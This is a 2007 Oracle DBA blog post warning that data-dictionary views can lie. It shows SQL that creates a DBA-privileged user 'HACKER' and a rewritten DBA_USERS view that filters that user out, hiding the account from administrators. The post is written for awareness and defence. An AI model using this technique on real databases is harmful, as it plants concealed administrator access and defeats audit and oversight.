Coskan’s Approach to Oracle

January 29, 2007

What if DBA views are not reliable ??

Filed under: Security — coskan @ 12:13 pm

Suppose that you are the DBA of big Corporate with many DB users.

One day you query the v$session table and you see a username HACKER.

who is this ????

firts you look to toad and see nothing about user HACKER

than you query dba_users

and you see nothing about user HACKER

Where this user come from ??? Why you cant see him ??

Answer is below.
13:04:40 SQL> create user hacker identified by hacker;

User created.

13:05:50 SQL> grant create session to hacker;

Grant succeeded.

13:05:58 SQL> grant dba to hacker;

Grant succeeded.

13:12:33 SQL> select username from dba_users where username=’HACKER';

no rows selected

but

13:14:23 SQL> select name from user$ where name = ‘HACKER';

NAME
——————————
HACKER

1 row selected.

The answer can be read between the lines

CREATE OR REPLACE VIEW DBA_USERS
(USERNAME, USER_ID, PASSWORD, ACCOUNT_STATUS, LOCK_DATE, EXPIRY_DATE,
DEFAULT_TABLESPACE, TEMPORARY_TABLESPACE, CREATED, PROFILE,
INITIAL_RSRC_CONSUMER_GROUP, EXTERNAL_NAME)
AS
select u.name, u.user#, u.password, m.status,
decode(u.astatus, 4, u.ltime, 5, u.ltime, 6, u.ltime,
8, u.ltime,9, u.ltime, 10, u.ltime, to_date(NULL)),
decode(u.astatus, 1, u.exptime, 2, u.exptime, 5, u.exptime,
6, u.exptime, 9, u.exptime, 10, u.exptime,
decode(u.ptime, ”, to_date(NULL),
decode(pr.limit#, 2147483647, to_date(NULL),
decode(pr.limit#, 0,
decode(dp.limit#, 2147483647, to_date(NULL), u.ptime +
dp.limit#/86400),
u.ptime + pr.limit#/86400)))),
dts.name, tts.name, u.ctime, p.name,
nvl(cgm.consumer_group, ‘DEFAULT_CONSUMER_GROUP’),
u.ext_username
from sys.user$ u left outer join sys.resource_group_mapping$ cgm
on (cgm.attribute = ‘ORACLE_USER’ and cgm.status = ‘ACTIVE’ and
cgm.value = u.name),
sys.ts$ dts, sys.ts$ tts, sys.profname$ p,
sys.user_astatus_map m, sys.profile$ pr, sys.profile$ dp
where u.datats# = dts.ts#
and u.resource$ = p.profile#
and u.tempts# = tts.ts#
and u.astatus = m.status#
and u.type# = 1
and u.resource$ = pr.profile#
and dp.profile# = 0
and dp.type#=1
and dp.resource#=1
and pr.type# = 1
and pr.resource# = 1
and u.name <> ‘HACKER’

Thanks Steve Callan, for informing us about the situation above.

http://www.dbasupport.com/oracle/ora10g/hackers.shtml

What i have learned today;

If you want to be a real dba look behind the VIEWS.

Security Comes First

Security First

About these ads

2 Comments »

  1. Wow, amazing blog layout! How long have you been blogging for?
    you made blogging look easy. The overall look of your site is fantastic, let alone the
    content!

    Comment by epson printer repair — September 3, 2014 @ 3:21 am

  2. Hiya! I know this is kinda off topic but I’d figured I’d ask.
    Would you be interested in trading links or maybe guest writing
    a blog article or vice-versa? My site goes over a lot of the same
    subjects as yours and I believe we could greatly benefit from
    each other. If you might be interested feel free to shoot me an email.

    I look forward to hearing from you! Wonderful blog by the way!

    Comment by Disc Jockey — September 10, 2014 @ 3:04 pm


RSS feed for comments on this post. TrackBack URI

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Theme: Silver is the New Black. Get a free blog at WordPress.com

Follow

Get every new post delivered to your Inbox.

Join 205 other followers

%d bloggers like this: